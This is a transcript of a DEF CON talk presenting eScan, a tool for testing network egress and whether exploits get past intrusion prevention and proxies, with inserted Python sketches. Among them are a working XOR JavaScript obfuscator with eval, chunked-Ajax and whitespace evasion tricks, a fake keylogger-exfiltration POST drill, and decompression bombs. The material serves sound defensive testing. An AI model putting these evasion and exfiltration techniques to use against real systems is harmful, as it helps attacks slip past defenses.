How you doing? I'm going to be with you in just a second. I have three versions. We have three versions of this show. And the idea to give you guys a choice of versions kind of came from an old game called Leather Goddesses of Phobos. Anybody ever play that? Yeah, I see a lot of hands. Leather Goddesses had three modes. They had tame, they had moderate, and they had lewd. Okay? How many people want the tame presentation? Ooh! How many people want the moderate presentation? Okay, how many people want the lewd presentation? Okay! Is it too early for beer at DEF CON? It's like barely noon. No. Is it better if it has fruit, like for breakfast? Does that work better? Okay, so lewd it is. Fuck, if that ain't right. So, quick introduction. I'm Matt Richard. I work for iDefense, a group that's part of Verisign. My background is I worked in financial services for about 10 years doing network ops and security ops, and then came to Verisign and just kind of hang out. So we have a quick talk on exploitability and extrusion scanning. Quick background: it's something I wrote as sort of a hobby, just from hanging around and being on different networks. Fred's going to join me. Fred's going to talk a little bit more on the risk angle. Oh yeah, this is Fred Doyle. I'm the director of the iDefense Research Lab. I see some people in here that were at our party the other night. I think we had a party. I remember a party, kind of. So I'm still hoarse from that party. We had a good time though, so everybody who joined us on that, thanks a lot for coming. And we're not using the same PC that the presentation was written on, so we've got a couple of little issues. Apple! So one of the quick things just to get out of the way: I tend to talk a little fast, so if I start rolling too fast, just throw a beer at me. I'll stop, drink it, slow down, and we'll be good to go.
So, a quick agenda. We're going to go through some background on why you would need a tool like this. What do extrusion and exploitability scanning mean? Why is vulnerability assessment not enough? What does it do and what doesn't it do? And by no means are we going to spend like 45 minutes on this, so don't walk out yet. I'm going to talk a little bit about extruders, and then we're going into the cool details of eScan: what it does, how it does it, and some of the different cool things it can do. Then we'll go through a couple of real-world examples with the code, how it works, and how you can use it for different tests. Fred's going to talk a little bit about the risk angle to it: now that you know all these crazy things that are allowed, and what kind of hostile networks you're on, what is the risk level of that kind of stuff? And then finally I've got some real data from when the tool was run on real networks, especially through real-world intrusion prevention and proxy systems, so we're going to look a little at what kinds of attacks things actually block, look at some of the exploitability data, and go through that. So just a couple of quick definitions. I don't know if you can see the image there, but exploitability apparently isn't really a word. I've just been using it for a while, so nothing actually recognizes it. But in the context that I use it, exploitability is whether something is exploitable through a series of defenses. A lot of enterprise networks have intrusion prevention, proxies, you know, 15 different layers, the defense-in-depth model, to try to block attacks, and we just want to know whether, through all those defenses, something is actually exploitable. We don't care if it's vulnerable; we just want to know if it's exploitable. Can exploits get through? Can we obfuscate them and do things to actually get them to pass through?
And then extrusion, very basic definition there: what kind of traffic can we get to leave a network? A lot of people try to lock down protocols and what can be used on their network, so the eScan framework gives us a way to test different protocols and different ports to see what we can actually get out of a network. Okay, we're going to start out here with what I call the Ripley moment. There was a time when a lot of people, not everybody, but a lot of people, most people in fact, thought that the internet was safe. In fact, I remember when I had a consulting firm in a computer store, my clients were forced to buy a $1,200 firewall, which, by the way, I set up using Linux and ipchains. Coupled with the modem in the slide? Yeah, yeah, yeah. Always had a modem, yeah. Who set up Linux with ipchains? Just a show of hands? Oh, my God, you're still alive. That's a good thing, because it was a pain in the ass. iptables is a lot easier. But anyhow, a lot of people thought that the internet was safe. Code Red, for example, came out. All my clients, because it was, of course, on the news, were like, am I in danger? No, remember that $1,200 device you didn't want to buy, but I made you? So you're all set, right? But the bottom line is this. Next slide, please. Obviously, that's not the case. Once we had one bad person on the internet, everything became bad. And that's why we're here today. All right? Now what we did, of course, is we developed fields of fire. We said, okay, there are things that we can't control. We'll never control the internet. We can't control anything beyond our modem. And we're mostly facing forward, okay? We are looking forward, looking at threats. And when we do pen testing, we test from the outside, looking in. But what we determined was that a good way to solve all these problems is to add layer after layer after layer after layer of security. And that's where we are today. Thanks.
We had planned this for remote control. All right, vulnerability assessment. These are all the things that we traditionally do to find out how secure we are. We do vulnerability assessment: is there something that can be attacked? Penetration testing, of course, we all know what that is. Risk assessment, well, we're in Vegas. Who here has done a good risk assessment in the past? Raise your hand. Okay, of those with your hands up, how many lost money at the tables? Yeah, my hand's still up. Okay, risk assessments. Any software vendors in here? If there are software vendors in here, please cover your ears, because I'm going to tell you right now, software vendors don't do risk assessment. They're whores. They're hookers. And I had to say that for two reasons. Reason number one, I want to be able to deduct the expense from the other night. Reason number two is because the software consumer is just like a john. They want it, the vendors want to give it to us, and we don't care about the risk. We're going to get into more of that later. So one of the other things, and this is kind of where a lot of my background is from, is ad hoc testing. In doing pen tests and everything else, good testers just sort of make a lot of stuff up on the fly, right? You don't necessarily have a plan. You just start looking at stuff and you start making things up. The real problem with that is it's not necessarily repeatable. It's not a framework. You see an opportunity, you dive at it. It's very ad hoc. That's a lot of where the eScan tool came from: I used to do a lot of testing and just try stuff out and put it in the report, and eventually I realized maybe it would be nice to actually have a framework to make it a little more repeatable, make it work a little better, and get some better data out of it that could be compared across runs.
So the big thing missing from all this traditional security assurance is: how effective is this stuff at preventing attacks against users? So we're going to go into vulnerability assessment and why it only does half the job. The key behind vulnerability assessment, right, is you have some kind of external stimulus, you measure the response, and you determine, through a banner or through a test, whether something's vulnerable or not. What that doesn't measure is what happens when things inside your network generate a stimulus, and what the response is. Right? Most vulnerability assessment tools are very geared at that: what's listening, what can we talk to that gives us something back, not what might talk to us that we can give something back to. So eScan's an attempt to dive into that arena a bit. We talked before about defense in depth. We've got all these layers, and obviously no defense-in-depth system is perfect, otherwise you wouldn't need the depth to begin with. So there are always cracks in the system, the little ways things can get out, things can get in between. Not everything protects against everything. So we want to measure some of those cracks, try to find them, and use a framework to get at them. When I was doing enterprise security, one of the things that always cracked me up is, CISOs have a big budget, right, and they want to spend lots of money on lots of flashy things. So you spend like $15 billion this year and you get like 17 new gadgets, and nobody actually knows what works and what doesn't. It just gets deployed, and there's a bunch of stuff out in the network, and nobody really does much testing to see: does our new shiny IPS actually block anything? Does the data leakage stuff do anything at all? Things like that.
And one of the other challenges, one of the things that makes defense in depth so hard, is that protocols are really complex, especially things like HTTP. There are so many things that can happen in HTTP. You've got layer on layer within HTTP. You've got JavaScript and Flash; it's pretty much a whole stack unto itself. One of the things I forgot to mention: if there are any questions as we go along, throw them out. By all means, not everything's complete on the slides, so if you see we're missing something, throw it out. So back to the vulnerability assessment gig. One of the issues with VA is you only check what's listening, and, of course, browsers and clients, like users, don't listen at all. Although, while doing some research for the presentation, one of the things I found is there's actually a Firefox add-on that creates a web server within Firefox, and that is awesome. So we're going to go through and create a framework that sees if our protections are easily bypassed: are we blocking common attacks, not bizarre things? Oh, yeah, and the other interesting thing, being in the enterprise world, is that there are actually people who don't patch because they think all the devices they spent $15 billion on actually do something. So they say, oh, no, we don't need to patch on Black Tuesday because our IPS already has a signature for that. We're safe, we're good to go. So one of the other problems comes when you get into big enterprises. If you have 100 users, patching is easy, right? That's everybody's answer. How do you solve the vulnerability issue? Patch. 100 users, easy, not that many applications. What about 350,000 workstations? Not necessarily as easy to figure out who's patched and who's not. Stuff just falls through the cracks. I mean, even .01% unpatched still leaves you a bunch of machines to get owned.
And at Citibank, 35 exploited machines might not be a good thing. So larger networks usually have more complex systems. Nobody tracks everything. You have ATMs running Windows. You've got camera systems running Windows, all the black-box stuff from vendors. Nobody knows what runs on anything. So what I want to do is add a little item to the vulnerability assessment: extrusion and exploitability assessment. Adding all this stuff we've talked about, measure the risk. I want to try some cool things too. Like, I want to look at common attacks that are out there, like MPack. If our IPS blocks one exploit, does it actually block what MPack does? And for those that don't know, MPack is the Russian attack toolkit that's been widely used. It was part of the Italian Job attacks a couple of months ago. It's got eight or nine different exploits in it. It's got a whole bunch of different encoding mechanisms. And it sells for $1,000 on the underground. So what are we missing? The text for the slide, obviously. Another thing that's missing from the vulnerability assessment game is the extrusion stuff. What can leave our network? How do we know what applications we block? Maybe 10 years ago, blocking port 5190 actually stopped AIM, but that's not going to happen anymore. Users want to use applications; security policies don't want them to. It's mainly an enterprise problem, but actually the roots of this all started back when I was a consultant. I would travel all over. And of course you've got tools on your machine that you need to do work, like Skype. So you plug into somebody's network and get the rude surprise that they don't allow Skype. So then you've got to go through the hassle of trying to figure out a way around it, tunnel around it, and do all that stuff. So I had actually started writing some tools to do that assessment automatically.
Just tell me how to configure my apps so that they'd work once I plugged in, without having to do any manual testing. So when I was running the big financial network, one of the things I learned that's completely bizarre is that people love AIM. AIM is like the most popular application people try to tunnel around for, for no reason at all. And they do everything. Like, tech users are doing things like running AIM over Tor just to get AIM. And actually, my favorite story: there was a president of a bank that was one of our customers, and again, the guy loved AIM for some reason. What he did is he actually installed a modem on his PC and was using AOL dial-up to get around the firewall filters, just for AIM. And the best part of it, and this is only like a year ago: he's dialed up to AOL, he's using his AIM, and he gets SQL Slammer and takes down like the whole enterprise network for hours. Nobody can figure it out. All because he just needed AIM. Insane. So how do you determine what works on your network? I mean, the easy thing is to go out, download AIM, install it, and see if it works. But that's kind of a pain, especially if you want to do like 500 different applications. So another thing extruders like to do is get remote access to their machine from home, beyond policy. There are a million different ways to do it. There's reverse VNC. You can do SSH port forwarding. There's a bunch of commercial stuff: GoToMyPC, LogMeIn. Some of that stuff's easily blocked. Some's not. But how do you know what works and what doesn't? So eScan is the tool that I wrote, originally just for the extrusion stuff, but then adapted. And we're going to go into a lot of details later, so if you're starting to nod off a little bit, don't worry. We're getting to the cool stuff soon. So we want to do a couple of things. We want to measure all that stuff. We want to go into, you know, what are we blocking?
What are we not blocking, yada yada. Where do the weeds grow through? Did we spend money in a way that lines up with the threats we were trying to protect against? So all enterprise networks have lots of layers. We've got things like transparent HTTP proxies, transparent SMTP, transparent DNS, intrusion prevention, all the data leakage stuff. We want to test through all of that and find out what works. Oh, I'm actually going to skip most of this slide, but one of the exploitability examples I really like was the original VML 0-day. When it came out, the proof of concept used the rect method. And so every IPS vendor out there, every security vendor, wrote their sigs for that rect vector, right? And it turns out there were like nine different shapes you could use to get the same exact effect. So the signatures were absolutely useless in protecting against anything but that proof of concept. So there are a couple of tools that I always used to use, obviously great tools that worked very well. My big gripe with all of them is that none of them had great automated ways of doing this. Metasploit: really good for running and seeing if your defenses are blocking certain types of exploits. Works really well. It's got a couple of encoding techniques in it, so you can get a lot of good information using Metasploit for that. There's another tool called Ftester, which does a lot of the same things. It'll do outbound firewall scans. You can take Snort signatures and have it pump them out to see what gets picked up. It's good, but it doesn't do everything I was looking for. It doesn't really behave like a client. It was taking just IDS signatures and pumping them out, rather than a full HTTP context that really gets all the data in there.
Because sometimes when you mess around with little variables, you find out a vendor might do something one way with this set of data and another way with another set of data. So just pumping sigs doesn't really do everything you want. Core Impact: really, really cool, and you could probably do all this with it, but it costs a lot, a lot of money. So not necessarily right for what I was looking for. So my whole goal with this was to write eScan and get it out there. It's going to be free. Most of the stuff is already out there at eScan.net, and it's going to be up on the iDefense site more than likely, too. Some of the code I didn't get to publish before I left, and I couldn't get a connection from my hotel, so some of it won't come out until I get home Monday. But we're going to go through and show different ways to use it. We're going to test for all those things, and we'll get some good reports at the end that show us what gets blocked and what doesn't. So here's a quick overview of the architecture. eScan is mainly written in Python. There are a couple of other components, like in PHP, as well. One of the things I like about Python is, one, it keeps me from writing really bad Perl code. The other thing it does is give you a nice shell where you can call functions right from the interpreter. So if you want to do manual testing, you can do it that way, or you can script it all. So the real core of eScan: you have the base classes, which implement a whole bunch of things like the AIM protocol, port scanning, HTTP encoders, and all the stuff we're going to need to do our testing later on, all in one base class. So we can import those base classes. And there's another section that does unit tests, so we can write a whole bunch of simple tests as unit tests and then have it run through all our unit tests later on. HTTP exploit checks.
So there's a module that just does encoding; we'll go through those methods. And AIM tests, of course. Everyone needs AIM, so we need lots of good tests. And then on the server side (that was all client-side stuff), there's a PHP exploiter that takes information and kicks it back out to the client. It'll actually send the exploits with whatever encoding we want. There's a TCP responder: when we're testing for things like transparent proxies, we can't always rely on just interacting with the proxy. Sometimes we need something on the outside of it that we can test through and try to make real connections to, to see what gets modified. And then finally SSH and tunnels and all those things. I didn't rewrite DNS tunneling or ICMP tunneling or any of that stuff, so all of that sits on an external server as well. The real key is we want to run our client-side stuff in our network and all the server-side stuff outside the defenses, so we're testing through everything rather than just at something. So, diving into the base classes. Egress scan is probably one of the simplest modules; it does an outbound port scan. All my examples here are from a Python interpreter, so you drop down to Python, import the base classes, and you can run everything just like this. For egress scanning, we pump in an IP and tell it we want to scan from port 1 to 1024, and it kicks back the results to us. I included Paramiko for SSH, so there's a whole wrapper around Paramiko for doing SSH and port forwarding. Real simple to use: you instantiate a class, it goes out and does an egress scan, tells us all the ports that are available, and then we tell it we want to check which protocols will actually let us pass SSH over them, and it kicks back all the different ways we can use SSH. So another module is the unit test harness.
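Before the unit test harness, here's a rough sketch of the egress scan just described. The function name and signature here are my assumptions for illustration, not eScan's actual API:

```python
# Sketch of an outbound (egress) port scan: for each port, attempt a
# TCP connect to an outside host and record which ports get out.
# This is an illustration of the idea, not the real eScan code.
import socket

def egress_scan(ip, start=1, end=1024, timeout=0.5):
    """Try a TCP connect on each port; return the ones that succeed."""
    open_ports = []
    for port in range(start, end + 1):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((ip, port))        # outbound connect got through
            open_ports.append(port)
        except (socket.timeout, OSError):
            pass                         # filtered or blocked outbound
        finally:
            s.close()
    return open_ports
```

The SSH wrapper works the same way conceptually: take the list of open ports this returns and try to negotiate SSH over each one.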
So you can write, and I know it's kind of hard to see up there, but basically with about seven lines you can write test descriptions. One of them up there is AIM over Tor: you tell it I want to use the Tor module, I want to make a TCP connection over Tor, I want to make it to login.oscar.aol.com, and I want to do it on port 5190. So you create all these little tests written like that, you kick them into the unit tester, and it tells you all the results coming back. I have maybe 50 or 60 unit tests, but it's really extensible. You can do pretty much anything you want with it: anything with TCP, SSH, ICMP tunnels, DNS tunnels, a whole list of different protocols and tunneling mechanisms. There's a whole separate Tor support section. It's actually a SOCKS module, but you can basically use any SOCKS server, because Tor just acts like a SOCKS 4 and 5 proxy. So you can instantiate a Tor class and then use it just like you would a socket in Python. You can do send and receive; it does all that legwork for you. And it's actually used by other modules as well if you're doing Tor testing. So one of the interesting things you can do with egress scanning is you can see what's proxied and what isn't. For people who saw Dan's talk, his big thing was hostile networks. How do you know when you're on a hostile network and things are being proxied? Sometimes it's really easy to tell. You just do an egress scan to a dark IP that doesn't exist at all. In this case, in the hotel I was staying at, I got three results back: 25, 53, 80. So it's a really easy hint that you're actually in a captive portal and that they're transparently proxying all those protocols. Another thing: a lot of providers block arbitrary things. They sometimes block IRC or all sorts of random things. So at my colo, I wanted to know what protocols they block. Really easy to fire off right from the command prompt. There's actually an extra flag.
block=1, which tells it to only show me ports that are blocked, not ones that are open. And then finally, another module called check_plain, which tests whether you've got a plain TCP socket as opposed to a proxied socket. So you can do things like, on port 80, try to make a direct connection and find out if there's a transparent proxy in the way. In this case the output's a little cryptic, but it's 0, 0, 1: I tested 25, 80, and 123, so not a plain connection, not a plain connection, plain. Real simple. All of this is actually a lot easier when you script it, but it's all easy to do from the interpreter as well. So the other phase is exploitability testing: we want to know what kinds of exploits we can pass and how we can encode them. HTTP is a really complex protocol, lots of different ways to do stuff. It's got like a whole protocol stack unto itself. You've got JavaScript. It supports native methods at the protocol layer like gzip, deflate, chunking, SSL. So we can try all those different ways of encoding things. We can use lots of different JavaScript methods, some that are used in the wild and some that I just made up. So we'll go through those things: Ajax, XOR, whitespace, random variables, random functions, a lot of stuff like from VoMM, stuff like that. So one of the things: IPS and IDS isn't really a great technology, and one of the main reasons is, take a look, here's a signature for detecting ANI exploits, and the big problem right here is that as long as it's going to an HTTP port, it'll detect it. So running things like HTTP over 443 is a trivial bypass to a signature like this. It's got hard-coded bytes in there, so any whitespace or other randomization or encoding completely bypasses it. So, some of the tricks: there's a module within eScan, HTTP encoders. The HTTP encoders allow you to take an arbitrary payload, do the encoding, and then kick it back to the client for testing.
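As a sketch of that encoder idea: eScan's server side is PHP, but the dispatch is simple enough to illustrate in Python. The function and encoder names here are mine, not eScan's:

```python
# Sketch of an HTTP payload encoder: take an arbitrary payload and
# wrap it in one of several content encodings before it goes back to
# the client. Illustrative only; eScan's real server side is PHP.
import gzip
import zlib

def encode_payload(payload: bytes, method: str) -> bytes:
    if method == "plain":
        return payload
    if method == "gzip":
        # gzip-compressed body, with a gzip header
        return gzip.compress(payload)
    if method == "deflate":
        # zlib-compressed body: no gzip header, as the talk describes
        return zlib.compress(payload)
    raise ValueError("unknown encoding: " + method)
```

A device that decodes `Content-Encoding: gzip` but not `deflate` will inspect one of these and wave the other straight through.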
Some of the ones: gzip, deflate. Interesting thing with those. Does anybody know what gzip and deflate do with browsers? Real simple, right? Just gzip the content. Deflate is gzip without a gzip header. Real simple. You'd be surprised how many devices will detect the gzip stuff but not deflate. What the fuck? So anyway, my favorite: Ajax. That one I kind of wrote myself. Ajax is kind of like a fragroute for HTTP. What you do, instead of just sending the entire exploit in one or two packets over a regular HTTP session, is use XMLHttpRequest and break it up into chunks. JavaScript is really nice: you can treat code like data and data like code. So you tell it, go out and get this exploit, break it up into any arbitrary number of chunks, send it back to me, I'll concatenate them all together and eval it. Real simple technique, but IDS and other things like that rely on actually seeing the code together. Even if the code is obfuscated, a lot of times they can pick it up. But if you break it up and do a fragroute-type attack, it works much, much better. So another one of my favorites: some of the encoders out there, and I'll actually go through MPack in a minute, do things like an XOR with a static key. So if you're looking at that in tcpdump or any other tool, you can actually see what key they're using to decode the data. Right? Simple loop. So what I like to do is actually send the key in a separate XMLHttpRequest, break it up. That way an analyst looking at it has no idea what the key is unless he's got all the network traffic instead of just a couple of packets. So here's MPack. It came out a little blurry, but MPack basically does a nice little XOR loop. On the top you've got a plain-text string, and this is all in the Python interpreter again: you've got document.write('hello world'). Run it through the MPack XOR engine.
It spits it out as an XOR function with all the data XORed into a blob, which will go through an XOR loop the browser then interprets. And the bottom example is just the same MPack XOR, except this time using random function and variable names. Just another way to get around some of the static detection that's out there. So here's an example of the Ajax encoding. Here's the source, and I mean it's not complex at all. Literally all you do is tell the server, I want to break this up into some random number of chunks, 20, 50, whatever it is, and give me each piece one by one; then reassemble them and eval. One of the interesting things is that this technique is really easy for humans to evaluate but really hard for machines. Humans can just go through, look at the code and see that, oh yeah, I just need a W, get all the different slices, assemble them back together, and I've got the code. Machines really, really don't like that. So the MPack attack toolkit, really famous and everything: they sell it for like a thousand dollars in the underground, an exorbitant price for something with a lot of flaws. So what I did when I was going through this is I looked and said, MPack is just terrible at encoding. So what I'll do is improve it for them and sell it back for like 10 grand, who knows. One of the stats on MPack: it only infects 3.3% of machines in the U.S., which is a terrible rate. It does a lot better in developing countries where every version of Windows is pirated and not patched. But in the U.S., 3.3%. And one of the reasons is that AV vendors actually pick up the MPack JavaScript. They do a terrible job of obfuscating beyond the one basic technique. So you've got the pseudocode for what they do, just a simple XOR of all the data. So some of my ideas for them, which I'm going to kick back in my business proposal: random function names, whitespace, comments, XMLHttpRequests for the XOR key, gzip encoding.
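As an illustration, an MPack-style XOR encoder with randomized identifiers might look roughly like this in Python. The emitted JavaScript template and all the names here are my sketch of the technique, not MPack's or eScan's actual code:

```python
# Sketch of an MPack-style XOR obfuscator: XOR the script body with a
# single-byte key, emit it as %XX-escaped text plus a tiny JS
# decode-and-eval loop. Random identifiers defeat naive static sigs.
import random
import string

def rand_name(n=8):
    """Random JS identifier: letter first, then letters/digits."""
    return random.choice(string.ascii_letters) + "".join(
        random.choices(string.ascii_letters + string.digits, k=n - 1))

def xor_encode_js(code: str, key: int) -> str:
    # Each source character becomes '%' plus two hex digits of (c ^ key).
    blob = "".join("%%%02x" % (ord(c) ^ key) for c in code)
    fn, data, out, i = (rand_name() for _ in range(4))
    return (
        "function %s(%s){var %s='';"
        "for(var %s=0;%s<%s.length;%s+=3)"
        "{%s+=String.fromCharCode(parseInt(%s.substr(%s+1,2),16)^%d);}"
        "eval(%s);}%s('%s');"
        % (fn, data, out, i, i, data, i, out, data, i, key, out, fn, blob))
```

Every call produces different function and variable names around the same XORed blob, so a byte-pattern signature written against one sample misses the next.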
And for God's sakes, these guys, have they ever heard of milw0rm? The newest exploit they have is like ANI from a couple of months ago. They have no new exploits at all. It's awful. So let's go through a couple of real-world examples, places where I've used it. Reality check number one: everybody's beloved AIM. If you want to actually do the unit tests for AIM, the type's a little bit small, but basically you just write a couple of simple tests for each case. Can I connect using default settings? Real easy to write up the test. Can I do crawl settings? Have it do a port scan of all of login.oscar.aol.com and kick back all the ways you can get there. Tor, same thing. So all this stuff is real easy to implement and automate for a testing scenario. And if it's a protocol that's not supported, just write a quick Python module for it and off you go. Some of the other cool things: I really like the tunneling stuff. There's a DNS tunnel module, an ICMP tunnel module, SSH port forwarding built in. So here are some more examples right from the command line. If you want to do HTTP exploit checking, it's as simple as calling one function: you call get_http_md5. And what's happening behind the scenes? You've got the two parts: the Python script, and then you've also got the server-side PHP. The Python script makes a request for the exploit. The server side takes all the content and adds an HTTP X- header with the MD5 of it. The client gets it back, compares the MD5, and now you know if it's been modified in transit. Real simple. So in this case we do the HTTP MD5 check by passing parameters to test.php. We tell it the encoding we want is plain and the exploit is linked in. And it kicks back and tells us in the results that the connection was broken.
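The client side of that MD5 comparison might look something like this sketch. The `X-Content-MD5` header name and the return values are my assumptions, not eScan's actual ones:

```python
# Sketch of the client-side MD5 check: fetch a test payload, recompute
# its MD5, and compare against the MD5 the server stamped into a
# custom header. Header name and URL scheme are assumptions.
import hashlib
import urllib.request

def check_http_md5(url):
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            body = resp.read()
            claimed = resp.headers.get("X-Content-MD5")
    except OSError:
        return "connection broken"   # an IPS likely killed the session
    if claimed is None:
        return "no md5 header"       # header stripped in transit?
    if hashlib.md5(body).hexdigest() == claimed:
        return "intact"              # the exploit made it through
    return "md5 mismatch"            # a proxy rewrote the content
```

Three distinct outcomes, three distinct behaviors of whatever sits in the middle.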
So broken TCP connections are a great indication that something's actually just been dropped. Next example, gzip. We run the same thing, and this time we see an MD5 mismatch. So the results we were expecting were different from what the MD5 says. Usually with that stuff, proxies like to modify the content instead of just dropping it. So instead of sending the exploit, they send you back a page that says something like, we blocked this page for you, you're safe now. Same thing with the MPack one: we see that one gets dropped. And you can go on and on with all the different encoding techniques forever. So one of the things that's real easy to just drop in: I have a quick function called try_them_all that goes through every possible permutation and kicks back the results to you in HTML, and now you can look and see what's being blocked and what isn't. At the end of the talk I've got some real-world data, and you can see some interesting patterns in different devices and how they look at exploits, so we'll look at that later on. We try all the different exploit techniques, all the different encoding techniques, and just for good measure we try a couple of different user agents too, just in case there's a difference between user agents. So my favorite one, and this one I used to do in operations, is testing incident response plans and MSSPs. So, managed security service providers: you pay a lot of money and you never really know what they do for you. It's kind of like a black box. You call them up, they say, oh yeah, you're covered, but they don't share anything with you. And you never really know if they're alerting you on everything. So one of the things that's easy to script out with this is an MSS test: fire off an exploit, fire off an additional request to get a payload, then have it fire out a bunch of POSTs with keylogger-looking data, and then sit back, watch, and see what happens.
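Scripted out, such an MSS fire drill might look roughly like this. Every URL, path, and parameter here is a placeholder of my own, not a real eScan endpoint:

```python
# Sketch of the MSSP drill just described: replay an exploit fetch,
# then a payload fetch, then a burst of fake "keylogger" POSTs, and
# see who calls you. All URLs and paths are placeholders.
import urllib.parse
import urllib.request

def fetch(url, data=None):
    """GET (or POST, if data is given) and record the outcome."""
    try:
        with urllib.request.urlopen(url, data=data, timeout=10) as r:
            return (url, r.status)
    except OSError as e:
        return (url, "blocked: %s" % e)

def mss_drill(server, fake_keystrokes, posts=5):
    results = []
    # Step 1 and 2: exploit request, then payload request.
    for path in ("/test.php?encode=plain&exploit=ani", "/payload.bin"):
        results.append(fetch(server + path))
    # Step 3: a burst of exfiltration-looking POSTs.
    data = urllib.parse.urlencode({"keys": fake_keystrokes}).encode()
    for _ in range(posts):
        results.append(fetch(server + "/drop.php", data))
    return results
```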
And then of course, the most important part: set up a cron job to run every Sunday morning at 4:30 just to make sure everyone's on their toes. So this is a great slide. I was doing some research, and I like to add an image every now and then, so I was looking for something to follow up "risky business," just a random image. And I came across the State of Nevada risk management center. They have this picture, and since you can't read the text, I put it right next to it: "Risk management is the expert management of differences that may exist between expectations and reality." And what in the hell is that picture? Blows my mind. What the fuck is that? It's crazy. So Fred's going to tell us exactly how all that works, and how eScan fits into the risk assessment process. You get all this data back, but what does it actually mean to you? If you're one of the corporate guys that actually needs to do risk assessments, how do you use it for something useful? So, Matt showed me that the other night, and I thought it was just because my blood alcohol was like a point three. But today, when I'm only a point two, it still doesn't make any sense. Risk management, the expert management of differences... that sounds like my first marriage. Anyhow, the bad thing is, here's our conventional risk assessment, and that misses the mark too. Who can tell me what any of that means? Well, obviously, it's arithmetic. And please don't say mathematics, it's arithmetic. We have some multiplication, we have some addition in there. But the bottom line is this: when you are making estimates on everything that you're doing, how can you really put a good value on what the risk is? The single loss expectancy, the annualized rate of occurrence, everything else like that: those are guesses. And if it's not a guess, if you have the statistics for it, what says that 2008 is going to be the same as 2007?
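For anyone who hasn't seen the conventional arithmetic he's poking at, it boils down to two multiplications. The numbers below are illustrative guesses, which is exactly the point being made:

```python
# The conventional CISSP-style risk arithmetic, spelled out.
# Every input here is an illustrative guess; that's the criticism.

def single_loss_expectancy(asset_value, exposure_factor):
    # SLE: how much of the asset one incident wipes out
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle, annual_rate_of_occurrence):
    # ALE = SLE * ARO
    return sle * annual_rate_of_occurrence

sle = single_loss_expectancy(100_000, 0.25)  # guess: one hit costs 25% of a $100k asset
ale = annualized_loss_expectancy(sle, 0.5)   # guess: one incident every two years
# ale comes out to 12500.0; precise-looking output from imprecise inputs
```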
How many people here have actually scanned for extrusions and exploitability? Please raise your hand. Okay, a fair number. Why hasn't everybody else? Well, the reason is because right now it looks like the risk is zero. It doesn't look like there's a risk from it. But just because we don't notice a rate of occurrence, or an occurrence at all, doesn't mean it's not there. So, the holistic threat assessment. That damn picture again; what the hell is it? Okay, in the holistic threat assessment we have to worry about what the asset value is, and instead of going through each one of these things, I'm just going to give you an example. I've got a house in Florida. Not really, but I wish. I have a house in Florida, and the house in Florida is susceptible to weather damage. So I've got the asset, I've got the vulnerability. The exacerbation is there's a hurricane off the coast. The mitigation is my house is made of steel. And the perturbation is: is this one of those 500-year storms that takes out everything in its path? Now I defy anybody in this room to use a standard CISSP model to give me a risk based on those things. Wait a minute, just to check: how many people have the "I am not a CISSP" badge? Nice. So basically what we're doing is trying to quantify something that we're starting off with guesswork. Right now, there's a different risk model that we're kind of looking at; it's still in the design stage. It is not arithmetic, it's real math. It's a real model. One of the elements is the holistic design that you saw before. But the bottom line is it appears to work very well with CVSS data. If you don't know, iDefense aggregates every vulnerability that is on our covered vendors list, and we keep that data. Right now we're doing CVSS scoring on it, and we've even started to use CVSS version 2 scoring.
And still we haven't gotten to 100%. The first model was maybe 60 to 70%. Now it's 80 to 90%, perhaps 80, 85%. But for the 15% that's left over, you still need a person. So why bother with the model? The model that we're working on is actually pretty much dead on for everything, so it looks good. Okay. So, real-world usage. This has been run; I've had some people run it for me, and I've been using this stuff for a while. As with anything, you get some interesting results back, so I'm going to go through a couple of those. The first one: for some reason, AOL servers don't respond to any TCP packets without an MSS, the max segment size option, and there's other things they don't do too. So one of the ideas I have is that you can probably fingerprint IPS devices just on the results you get back, from weird things like not replying without an MSS. Obviously it could be the servers that drop it, but it could be something else in between. So there's maybe some opportunity to do passive fingerprinting of devices, just by watching what they drop and don't respond to. The next one: just because they don't ask doesn't mean they don't want it. One of the interesting things I found is that browsers, when they want to use an encoding mechanism that's supported, like gzip or deflate or chunked, they ask for it, right? They put in an Accept-Encoding header that says accept gzip, accept deflate. But sometimes proxies strip that out, sometimes they don't send it because they don't support it, things like that. The interesting thing with Firefox, IE, and a couple of other browsers is that even if that tag gets stripped out, or even if they never ask for it, you can send it to them and they'll still just render it. So actually having that in the header means nothing. You just send the gzip data back to them and they'll render it just fine.
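That browser behavior can be mimicked in a couple of lines. This is a stand-in sketch, not real browser code: a "client" that decodes a gzip body whenever the server marks it as gzip, regardless of whether it ever sent an Accept-Encoding header.

```python
import gzip

# Sketch of the behavior just described: render a gzip body whenever the
# server says Content-Encoding: gzip, whether or not the client ever sent
# an Accept-Encoding header. Mimics what Firefox/IE were observed doing.

def render_body(response_headers, body):
    if response_headers.get("Content-Encoding") == "gzip":
        return gzip.decompress(body)  # decoded anyway; nobody asked for it
    return body

payload = b"<script>alert(1)</script>"
page = render_body({"Content-Encoding": "gzip"}, gzip.compress(payload))
# page is the original payload, "rendered" despite never asking for gzip
```

Which is why a filter that only inspects gzip when the client advertised it can be walked right past.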
So another interesting thing: simple tactics. This is probably obvious, but they're incredibly effective against almost every kind of device, every kind of IPS and proxy. Just things like random white space: 50% effective in the real-world testing. Just adding spaces kills that many protections. Remember the old mail bomb against mail servers? If you wanted to crash a mail server that had antivirus, you'd dd a terabyte from /dev/zero, gzip it down to like 20K, and mail it through, and the server tries to open it up and just dies. Bombs. Yeah, that kind of works with proxies too. They don't really like gzip data like that; a petabyte of zeros doesn't decompress that fast. So, interesting. Did anyone read the interview with the MPack authors, the Dream Coders Team? They did an interview on SecurityFocus with Rob Lemos. At the very end, they're asked: if people want to be safe from your attacks, what should they use? And he says Opera, whatever. It's actually IE4 on NT4. One of the interesting things is that most of the exploits and most of the encoding mechanisms won't even render on it. Things like gzip, it just dies on; like half that stuff doesn't even work right on it. So it's actually incredibly effective against all kinds of encoding, because it just doesn't do anything with it. And as we'll see in the next couple of slides, as long as you can block out all that encoding, some devices actually do a decent job at blocking attacks. So NT4 behind an IPS might actually be safe. So here's some quick output from exploitability scanning, just doing some HTTP checking. The output basically tells you: here's the test that you ran, here's the port it ran it on, because one of the other things it does is try both HTTP and HTTPS.
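The decompression-bomb trick is the same in Python as with dd and gzip on the command line; here's a toy version, scaled way down from a terabyte. The function name is made up for the example.

```python
import gzip

# Toy version of the decompression-bomb trick above: highly repetitive
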